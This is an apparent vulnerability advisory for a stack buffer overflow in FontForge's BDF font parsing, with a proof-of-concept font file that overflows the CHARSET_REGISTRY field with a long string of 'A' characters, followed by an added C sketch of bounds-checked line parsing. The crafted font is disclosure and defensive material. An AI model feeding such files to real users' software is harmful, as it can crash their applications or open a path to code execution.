Source: https://www.securityfocus.com/bid/45162/info

FontForge is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.

An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

FontForge 0.0.20100501-2 is vulnerable; other versions may also be affected.

PoC:

STARTFONT 2.1
FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1
SIZE 16 75 75
CHARSET_REGISTRY AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
FONTBOUNDINGBOX 16 16 0 -2
STARTPROPERTIES 2
FONT_ASCENT 14
FONT_DESCENT 2
ENDPROPERTIES
CHARS 1
STARTCHAR U+0041
ENCODING 65
SWIDTH 500 0
DWIDTH 8 0
BBX 8 16 0 -2
BITMAP
00
00
00
00
18
24
24
42
42
7E
42
42
42
42
00
00
ENDCHAR
ENDFONT
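
Added example (not FontForge's code and not part of the original advisory): a bounds-checked way to split a BDF line such as the CHARSET_REGISTRY line above into keyword and value, rejecting an oversized token instead of copying it into a fixed stack buffer. The function names, status codes and the 64/128-byte limits are assumptions made for this sketch.

```c
#include <stdio.h>
#include <string.h>

#define BDF_KEY_MAX 64    /* assumed limits, chosen for this example */
#define BDF_VAL_MAX 128
enum { BDF_OK = 0, BDF_EMPTY = -1, BDF_KEY_TOO_LONG = -2, BDF_VAL_TOO_LONG = -3 };

/* Split one BDF line ("KEYWORD value...") into key and value.
 * Each length is checked against the destination size before the copy;
 * an oversized token is rejected, not truncated, so the file can be refused. */
int bdf_parse_line(const char *line, char key[BDF_KEY_MAX], char val[BDF_VAL_MAX])
{
    key[0] = val[0] = '\0';
    line += strspn(line, " \t");                 /* skip leading blanks */
    size_t klen = strcspn(line, " \t\r\n");      /* keyword ends at whitespace */
    if (klen == 0) return BDF_EMPTY;
    if (klen >= BDF_KEY_MAX) return BDF_KEY_TOO_LONG;
    memcpy(key, line, klen);
    key[klen] = '\0';

    const char *v = line + klen + strspn(line + klen, " \t");
    size_t vlen = strcspn(v, "\r\n");            /* value runs to end of line */
    while (vlen > 0 && (v[vlen - 1] == ' ' || v[vlen - 1] == '\t')) vlen--;
    if (vlen >= BDF_VAL_MAX) return BDF_VAL_TOO_LONG;
    memcpy(val, v, vlen);
    val[vlen] = '\0';
    return BDF_OK;
}

/* Constructed input: "CHARSET_REGISTRY " followed by n 'A' characters. */
int parse_filled_registry(size_t n)
{
    static char line[1024];
    char key[BDF_KEY_MAX], val[BDF_VAL_MAX];
    if (n > sizeof line - 32) return -100;       /* keep the sample in bounds */
    int off = snprintf(line, sizeof line, "CHARSET_REGISTRY ");
    memset(line + off, 'A', n);
    line[off + n] = '\0';
    return bdf_parse_line(line, key, val);
}

int main(void)
{
    char key[BDF_KEY_MAX], val[BDF_VAL_MAX];
    int rc = bdf_parse_line("FONT_ASCENT 14\n", key, val);
    printf("rc=%d key=%s val=%s\n", rc, key, val);
    printf("overlong value rc=%d\n", parse_filled_registry(300));
    return 0;
}
```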